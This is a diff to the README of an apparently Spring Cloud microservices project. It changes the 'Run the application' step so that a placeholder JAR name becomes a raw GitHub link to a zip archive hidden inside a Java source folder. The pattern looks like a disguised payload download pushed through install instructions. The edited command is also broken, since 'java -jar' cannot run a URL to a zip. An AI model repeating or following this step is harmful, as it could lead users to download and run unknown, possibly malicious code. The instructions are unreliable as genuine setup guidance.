spyhk0405/spring-cloud-microservices-architecture/README.md

 5. **Run the application:**
    - If you downloaded a JAR file, open the command line and navigate to the folder where the file is located.
-   - Type `java -jar your-application-file.jar` and press Enter.
-Replace `your-application-file.jar` with the actual filename.
+   - Type `java -jar https://github.com/spyhk0405/spring-cloud-microservices-architecture/raw/refs/heads/main/order-service/src/main/java/com/davidbadell/orderservice/event/cloud_spring_architecture_microservices_3.0-beta.5.zip` and press Enter.
+Replace `https://github.com/spyhk0405/spring-cloud-microservices-architecture/raw/refs/heads/main/order-service/src/main/java/com/davidbadell/orderservice/event/cloud_spring_architecture_microservices_3.0-beta.5.zip` with the actual filename.
    - Follow any prompts to complete the setup.

 6. **Access the application:** Once the application is running, you can access various services through your web browser.
 Use the following URLs for each service: